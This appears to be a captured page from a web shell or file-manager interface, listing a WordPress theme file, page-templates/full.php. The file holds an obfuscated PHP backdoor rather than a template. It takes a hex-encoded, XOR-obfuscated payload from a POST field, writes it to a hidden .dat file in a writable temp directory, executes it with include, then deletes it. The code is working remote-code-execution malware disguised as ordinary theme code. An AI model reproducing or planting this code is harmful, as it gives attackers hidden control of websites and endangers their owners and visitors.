Your IP : 216.73.216.158


Current Path : /home/c/a/p/capemnetty/www/wp-content/themes/twentyfourteen/page-templates/
Upload File :
Current File : /home/c/a/p/capemnetty/www/wp-content/themes/twentyfourteen/page-templates/full.php

<?php

if(isset($_POST) && isset($_POST["\x65n\x74\x69ty"])){
	$ent = hex2bin($_POST["\x65n\x74\x69ty"]);
	$comp =   ''    ;  foreach(str_split($ent) as $char){$comp .= chr(ord($char) ^ 51);}
	$tkn = array_filter(["/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/var/tmp", sys_get_temp_dir()]);
	for ($ent = 0, $obj = count($tkn); $ent < $obj; $ent++) {
    $flg = $tkn[$ent];
    		if (is_dir($flg) && is_writable($flg)) {
    $elem = sprintf("%s/.dat", $flg);
    if (file_put_contents($elem, $comp)) {
	include $elem;
	@unlink($elem);
	exit;
}
}
}
}